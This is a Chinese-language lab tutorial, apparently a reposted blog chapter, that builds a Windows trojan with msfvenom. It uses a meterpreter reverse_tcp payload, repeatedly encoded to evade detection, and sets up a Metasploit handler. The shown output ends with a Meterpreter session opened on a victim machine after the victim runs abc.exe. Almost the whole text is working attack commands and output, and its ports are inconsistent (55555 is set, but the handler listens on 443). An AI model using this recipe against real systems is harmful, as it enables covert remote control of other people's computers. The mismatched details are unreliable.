kali攻防第9章 Metasploit之我的远程控制软件

来源：互联网发布：京东秒杀的软件编辑：程序博客网时间：2024/04/29 22:07

准备工具

1、KALI系统 IP 10.10.10.131

2、受害系统 IP 10.10.10.133

步骤：

1、生成木马控制程序

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=10.10.10.131 LPORT=443 -f exe > abc.exe

No platform was selected, choosing Msf::Module::Platform::Windows from the payload

No Arch selected, selecting Arch: x86 from the payload

Found 1 compatible encoders

Attempting to encode payload with 5 iterations of x86/shikata_ga_nai

x86/shikata_ga_nai succeeded with size 360 (iteration=0)

x86/shikata_ga_nai succeeded with size 387 (iteration=1)

x86/shikata_ga_nai succeeded with size 414 (iteration=2)

x86/shikata_ga_nai succeeded with size 441 (iteration=3)

x86/shikata_ga_nai succeeded with size 468 (iteration=4)

x86/shikata_ga_nai chosen with final size 468

Payload size: 468 bytes

注意： LHOST和LPORT是本地自己的IP不是受害者的IP

2、通过命令启动Metasploit

root@kali:~# msfconsole

+-------------------------------------------------------+

| METASPLOIT by Rapid7 |

+---------------------------+---------------------------+

| __________________ | |

| ==c(______(o(______(_() | |""""""""""""|======[*** |

| )=\ | | EXPLOIT \ |

| // \\ | |_____________\_______ |

| // \\ | |==[msf >]============\ |

| // \\ | |______________________\ |

| // RECON \\ | \(@)(@)(@)(@)(@)(@)(@)/ |

| // \\ | ********************* |

+---------------------------+---------------------------+

| o O o | \'\/\/\/'/ |

| o O | )======( |

| o | .' LOOT '. |

| |^^^^^^^^^^^^^^|l___ | / _||__ \ |

| | PAYLOAD |""\___, | / (_||_ \ |

| |________________|__|)__| | | __||_) | |

| |(@)(@)"""**|(@)(@)**|(@) | " || " |

| = = = = = = = = = = = = | '--------------' |

+---------------------------+---------------------------+

Save 45% of your time on large engagements with Metasploit Pro

Learn more on http://rapid7.com/metasploit

=[ metasploit v4.11.5-2015103001 ]

+ -- --=[ 1500 exploits - 864 auxiliary - 251 post ]

+ -- --=[ 432 payloads - 37 encoders - 8 nops ]

+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

3、使用handler模块

msf > use exploit/multi/handler

4、查看handler参数

msf exploit(handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description

---- --------------- -------- -----------

Exploit target:

Id Name

-- ----

0 Wildcard Target

5、shellcode设置

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf exploit(handler) > SHOW

[-] Unknown command: SHOW.

msf exploit(handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description

---- --------------- -------- -----------

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------

EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)

LHOST 10.10.10.131 yes The listen address

LPORT 4444 yes The listen port

Exploit target:

Id Name

-- ----

0 Wildcard Target

6、修改LHOST和LPORT端口

msf exploit(handler) > set LHOST 10.10.10.131

LHOST => 10.10.10.131

msf exploit(handler) > set LPORT 55555

LPORT => 55555

msf exploit(handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description

---- --------------- -------- -----------

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------

EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)

LHOST 10.10.10.131 yes The listen address

LPORT 55555 yes The listen port

7、执行exploit命令

msf exploit(handler) > exploit

8、受害者执行abc.exe文件

9、验证

[*] Started reverse handler on 10.10.10.131:443

[*] Starting the payload handler...

[*] Sending stage (885806 bytes) to 10.10.10.133

[*] Meterpreter session 1 opened (10.10.10.131:443 -> 10.10.10.133:1049) at 2015-12-07 23:41:20 +0800

0 0